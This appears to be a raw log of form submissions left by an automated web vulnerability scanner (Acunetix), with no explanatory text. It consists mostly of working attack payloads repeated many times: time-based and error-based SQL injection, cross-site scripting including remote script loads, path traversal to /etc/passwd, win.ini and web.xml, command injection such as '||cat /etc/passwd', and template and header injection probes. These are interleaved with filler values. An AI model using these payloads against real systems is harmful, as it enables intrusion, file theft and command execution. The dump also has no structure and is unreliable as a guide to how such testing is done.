(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<ScRiPt >prompt(947388)</ScRiPt>

1&n987304=v964988

1some_inexistent_file_with_long_name%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

1<script>prompt(997436)</script>

1

WEB-INF\web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1<ScRiPt >prompt(987857)</ScRiPt>

'

1

testasp.vulnweb.com

1

-1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986656></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

"

1

)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<ScRiPt >prompt(905494)</ScRiPt>

-1))

||cat /etc/passwd

1

!(()&&!|*|*|

1

1

1<video><source onerror="javascript:prompt(948690)">

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

uLJMiKeV'

1

&dir

^(#$!@#$)(()))******

'"()

1

1

Lq31z0LF')

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976150)"></g></svg>

1

1

1

1

'&dir&'

QmkWNm4P'))

1

file:///etc/passwd

1

1

1

1<div style=width:expression(prompt(977106))>

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<iframe src='data:text/html

1

1

|dir

-1)

http://hitRSH55K1JnQ.bxss.me/

WEB-INF/web.xml

acunetix_wvs_invalid_filename

1

1

1<body onload=prompt(932048)>

"

-1))

1

WEB-INF\web.xml

comments

'|dir

1

1

1

1bubqM3U'

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945133)>

1'"

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

../../../../../../../../../../windows/win.ini

1

1<img src=xyz OnErRor=prompt(939894)>

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(84),CHAR(82),CHAR(82),CHAR(113),CHAR(98),CHAR(67),CHAR(114),CHAR(65)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

${@print(md5(acunetix_wvs_security_test))}\

1

GzK2DgXQ')

1

comments/.

1

1

1

BdDjxWkV'))

1<img/src=">" onerror=alert(986357)>

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(84),CHAR(82),CHAR(82),CHAR(113),CHAR(98),CHAR(67),CHAR(114),CHAR(65)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

../../../../../../../../../../boot.ini

1

1

http://www.acunetix.tst

1

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(84)+CHAR(82)+CHAR(82)+CHAR(113)+CHAR(98)+CHAR(67)+CHAR(114)+CHAR(65)) FROM syscolumns)

1<ScRiPt%20>prompt(919161)</sCripT>

1

1

1

1

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(84)+CHAR(82)+CHAR(82)+CHAR(113)+CHAR(98)+CHAR(67)+CHAR(114)+CHAR(65))

1&lt

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xf6<img acu onmouseover=prompt(985431) //\xf6>

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(79),CHAR(116),CHAR(79),CHAR(90),CHAR(54),CHAR(56),CHAR(121),CHAR(109)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1

1

1<input autofocus onfocus=prompt(921974)>

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(79),CHAR(116),CHAR(79),CHAR(90),CHAR(54),CHAR(56),CHAR(121),CHAR(109)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

'"

................windowswin.ini

1'"()&%<ScRiPt >prompt(946288)</ScRiPt>

response.write(9174464*9071126)

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(79)+CHAR(116)+CHAR(79)+CHAR(90)+CHAR(54)+CHAR(56)+CHAR(121)+CHAR(109)) FROM syscolumns)+'

<a href='http://www.acunetix.com'>website security</a>

1

..\..\..\..\..\..\..\..\windows\win.ini

'"()&%<ScRiPt >prompt(941707)</ScRiPt>

<!--

'+response.write(9174464*9071126)+'

1

1

[url=http://www.acunetix.com]website security[/url]

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(79)+CHAR(116)+CHAR(79)+CHAR(90)+CHAR(54)+CHAR(56)+CHAR(121)+CHAR(109))+'

1_900626

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9174464*9071126)+"

1

1

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(105),CHAR(80),CHAR(119),CHAR(121),CHAR(83),CHAR(65),CHAR(85)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1_FvLJ1 <ScRiPt >prompt(949697)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(105),CHAR(80),CHAR(119),CHAR(121),CHAR(83),CHAR(65),CHAR(85)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(105)+CHAR(80)+CHAR(119)+CHAR(121)+CHAR(83)+CHAR(65)+CHAR(85)) FROM syscolumns)+"

1

1

1

1

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(105)+CHAR(80)+CHAR(119)+CHAR(121)+CHAR(83)+CHAR(65)+CHAR(85))+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

acu5688\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5688

1

1

1

"&cat /etc/passwd&"

acux5836\xc0\xbez1\xc0\xbcz2a\x90bcxuca5836

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<ScRiPt >prompt(907357)</ScRiPt>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

cat /etc/passwd

1

1

1

1<script>prompt(957568)</script>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

-1

1<ScRiPt >prompt(966725)</ScRiPt>

${100436+99768}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983286></ScRiPt>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&n912060=v977138

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<ScRiPt >prompt(924675)</ScRiPt>

)

0eoTERdK'

1

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

2AhFN3CI')

!(()&&!|*|*|

1

1

1<video><source onerror="javascript:prompt(955715)">

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969540)"></g></svg>

1

4hHgruSi'))

^(#$!@#$)(()))******

1

1

'"()

'

/etc/passwd

1

1<div style=width:expression(prompt(910475))>

1

1

-1

1

1

1<iframe src='data:text/html

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1)

1

1

'

||cat /etc/passwd

1

1<body onload=prompt(944705)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

-1))

acunetix_wvs_invalid_filename

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943499)>

http://hitLi1uQz0Iu7.bxss.me/

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

tuWjPIcy'

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=xyz OnErRor=prompt(952717)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

'&dir&'

1

KS8AIzZy')

1

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img/src=">" onerror=alert(914819)>

comments/.

http://www.acunetix.tst

"&dir&"

4LJezchs'))

1

'"

1<ScRiPt%20>prompt(946551)</sCripT>

1'"()&%<ScRiPt >prompt(987506)</ScRiPt>

1

1

|dir

<!--

1

file:///etc/passwd

1

1&lt

1

'"()&%<ScRiPt >prompt(960874)</ScRiPt>

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_957928

\xf6<img acu onmouseover=prompt(909364) //\xf6>

1

WEB-INF/web.xml

1

"|dir

1

response.write(9001198*9674470)

1<input autofocus onfocus=prompt(905226)>

1

1

WEB-INF\web.xml

1

1

<a href='http://www.acunetix.com'>website security</a>

'+response.write(9001198*9674470)+'

../../../../../../../../../../windows/win.ini

1

&cat /etc/passwd&

1

1

"+response.write(9001198*9674470)+"

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../boot.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_0OlMn <ScRiPt >prompt(926225)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

................windowswin.ini

acu1760\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1760

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

acux10512\xc0\xbez1\xc0\xbcz2a\x90bcxuca10512

1

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

1

|cat /etc/passwd#

1

1<ScRiPt >prompt(911919)</ScRiPt>

${99654+99175}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'|'ld

1<script>prompt(942336)</script>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n914757=v921165

1<ScRiPt >prompt(939004)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901768></ScRiPt>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

testasp.vulnweb.com

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

)

1<ScRiPt >prompt(931169)</ScRiPt>

1

1

'

/etc/passwd

-1

1

!(()&&!|*|*|

1

1<video><source onerror="javascript:prompt(994822)">

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906159)"></g></svg>

WEB-INF/web.xml

1

1

^(#$!@#$)(()))******

-1)

1

||cat /etc/passwd

1<div style=width:expression(prompt(914383))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

WEB-INF\web.xml

1

'"()

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1<iframe src='data:text/html

r3kvtSOe'

1

1

1

1

PyusQu2W')

'&dir&'

1<body onload=prompt(900178)>

1

1

1

1

1

QphHglPi'))

1

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990623)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

'

1

file:///etc/passwd

1

|dir

1

1<img src=xyz OnErRor=prompt(900176)>

1

-1)

acunetix_wvs_invalid_filename

1

"

-1))

1<img/src=">" onerror=alert(919514)>

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

http://hitNzQOJbkGth.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

comments

1

1<ScRiPt%20>prompt(905629)</sCripT>

LaCpO67k'

${@print(md5(acunetix_wvs_security_test))}\

WEB-INF/web.xml

"|dir

1'"

1

1

comments

Inyshfzg')

1&lt

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

WEB-INF\web.xml

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(118),CHAR(98),CHAR(71),CHAR(122),CHAR(51),CHAR(83),CHAR(100)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

1

comments/.

oZivgmg3'))

1

\xf6<img acu onmouseover=prompt(943282) //\xf6>

1

http://www.acunetix.tst

1

1

1

../../../../../../../../../../windows/win.ini

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(118),CHAR(98),CHAR(71),CHAR(122),CHAR(51),CHAR(83),CHAR(100)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

'"

1<input autofocus onfocus=prompt(933307)>

1

1

<!--

../../../../../../../../../../boot.ini

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(76)+CHAR(118)+CHAR(98)+CHAR(71)+CHAR(122)+CHAR(51)+CHAR(83)+CHAR(100)) FROM syscolumns)

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(76)+CHAR(118)+CHAR(98)+CHAR(71)+CHAR(122)+CHAR(51)+CHAR(83)+CHAR(100))

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(101),CHAR(121),CHAR(52),CHAR(70),CHAR(76),CHAR(118),CHAR(87),CHAR(53)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

response.write(9773363*9687906)

1

1'"()&%<ScRiPt >prompt(967116)</ScRiPt>

1

1_kDtsv <ScRiPt >prompt(957911)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(101),CHAR(121),CHAR(52),CHAR(70),CHAR(76),CHAR(118),CHAR(87),CHAR(53)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

&cat /etc/passwd&

1

1

'+response.write(9773363*9687906)+'

1

'"()&%<ScRiPt >prompt(940584)</ScRiPt>

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(101)+CHAR(121)+CHAR(52)+CHAR(70)+CHAR(76)+CHAR(118)+CHAR(87)+CHAR(53)) FROM syscolumns)+'

1

................windowswin.ini

'&cat /etc/passwd&'

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(101)+CHAR(121)+CHAR(52)+CHAR(70)+CHAR(76)+CHAR(118)+CHAR(87)+CHAR(53))+'

1

1_955218

1

"+response.write(9773363*9687906)+"

1

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(109),CHAR(87),CHAR(71),CHAR(88),CHAR(99),CHAR(49),CHAR(72)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

1

1

cat /etc/passwd

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(109),CHAR(87),CHAR(71),CHAR(88),CHAR(99),CHAR(49),CHAR(72)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(109)+CHAR(87)+CHAR(71)+CHAR(88)+CHAR(99)+CHAR(49)+CHAR(72)) FROM syscolumns)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(109)+CHAR(87)+CHAR(71)+CHAR(88)+CHAR(99)+CHAR(49)+CHAR(72))+"

1

|cat /etc/passwd#

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"|"ld

acu8986\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8986

1

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(8.968),0)/*'XOR(if(now()=sysdate(),sleep(8.968),0))OR'"XOR(if(now()=sysdate(),sleep(8.968),0))OR"*/

1

${99062+100174}

acux9939\xc0\xbez1\xc0\xbcz2a\x90bcxuca9939

1

1

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt >prompt(926059)</ScRiPt>

1

(select(0)from(select(sleep(13.452)))v)/*'+(select(0)from(select(sleep(13.452)))v)+'"+(select(0)from(select(sleep(13.452)))v)+"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'

1

1&n924170=v985675

1<script>prompt(917985)</script>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1)

1<ScRiPt >prompt(906652)</ScRiPt>

"

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925180></ScRiPt>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

testasp.vulnweb.com

1<ScRiPt >prompt(944180)</ScRiPt>

1

||cat /etc/passwd

)

1

/etc/passwd

1

1

7GiINbFK'

1<video><source onerror="javascript:prompt(932442)">

!(()&&!|*|*|

1

'"()

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945511)"></g></svg>

1

p2LoMCN3')

1

^(#$!@#$)(()))******

1

'&dir&'

1

1

1

1

1

2rpOVbw9'))

1<div style=width:expression(prompt(978185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

1

1

1

1<iframe src='data:text/html

-1

1

1<body onload=prompt(915169)>

|dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946087)>

-1)

'

1

1

1<img src=xyz OnErRor=prompt(929146)>

http://hite09GCe77pi.bxss.me/

1

'|dir

acunetix_wvs_invalid_filename

"

-1))

1

1<img/src=">" onerror=alert(977241)>

"|dir

comments

1

1

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1<ScRiPt%20>prompt(940108)</sCripT>

26TbJwaN'

comments

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

O4xROK0b')

1

1&lt

1

1

1

1

http://www.acunetix.tst

WEB-INF/web.xml

1

1

\xf6<img acu onmouseover=prompt(950584) //\xf6>

szZUawfC'))

1

WEB-INF\web.xml

1

'"

1

1

1

1

1<input autofocus onfocus=prompt(919214)>

1

<!--

1

1

../../../../../../../../../../windows/win.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../boot.ini

1

1

1'"()&%<ScRiPt >prompt(912092)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_0Vfu7 <ScRiPt >prompt(959269)</ScRiPt>

response.write(9371169*9017921)

1

1

&cat /etc/passwd&

'"()&%<ScRiPt >prompt(969510)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'+response.write(9371169*9017921)+'

1

'&cat /etc/passwd&'

1

1

1

................windowswin.ini

"+response.write(9371169*9017921)+"

1

1_948296

1

1

"&cat /etc/passwd&"

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

`cat /etc/passwd`

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'|'ld

1

acu9837\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9837

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"|"ld

1

${99344+99142}

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

acux5503\xc0\xbez1\xc0\xbcz2a\x90bcxuca5503

1

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(917352)</ScRiPt>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(921811)</script>

'

1

WEB-INF\web.xml

1&n902317=v918738

1

1some_inexistent_file_with_long_name%00.jpg

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(996124)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965933></ScRiPt>

-1)

testasp.vulnweb.com

1

1

)

||cat /etc/passwd

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1))

1

1<ScRiPt >prompt(904670)</ScRiPt>

&dir

1

!(()&&!|*|*|

1

'"()

1

1<video><source onerror="javascript:prompt(931516)">

ndbg1SLc'

/etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965772)"></g></svg>

1

1

'&dir&'

^(#$!@#$)(()))******

Md9EOOL4')

1

1<div style=width:expression(prompt(921185))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

1

1

'

"&dir&"

UseFzLgi'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<body onload=prompt(919857)>

1

1

acunetix_wvs_invalid_filename

|dir

-1

1

http://hitQsfWNA5hP5.bxss.me/

"

1

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904988)>

-1)

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

comments

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1'"

1

1<img src=xyz OnErRor=prompt(915459)>

http://www.acunetix.tst

1

comments/.

1

"|dir

1<img/src=">" onerror=alert(980110)>

file:///etc/passwd

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(119),CHAR(75),CHAR(119),CHAR(86),CHAR(122),CHAR(97),CHAR(122),CHAR(100)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

gxBSRXZ5'

1

'"

1

1

aZWDP78t')

/\../\../\../\../\../\../\../etc/passwd

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(119),CHAR(75),CHAR(119),CHAR(86),CHAR(122),CHAR(97),CHAR(122),CHAR(100)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1<ScRiPt%20>prompt(906264)</sCripT>

1

1

1

1

1

<!--

SDVDenWw'))

1&lt

WEB-INF/web.xml

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(119)+CHAR(75)+CHAR(119)+CHAR(86)+CHAR(122)+CHAR(97)+CHAR(122)+CHAR(100)) FROM syscolumns)

1

1

1

1

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(919282)</ScRiPt>

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(119)+CHAR(75)+CHAR(119)+CHAR(86)+CHAR(122)+CHAR(97)+CHAR(122)+CHAR(100))

1

\xf6<img acu onmouseover=prompt(936633) //\xf6>

1

1

1

'"()&%<ScRiPt >prompt(908563)</ScRiPt>

../../../../../../../../../../windows/win.ini

response.write(9716930*9792632)

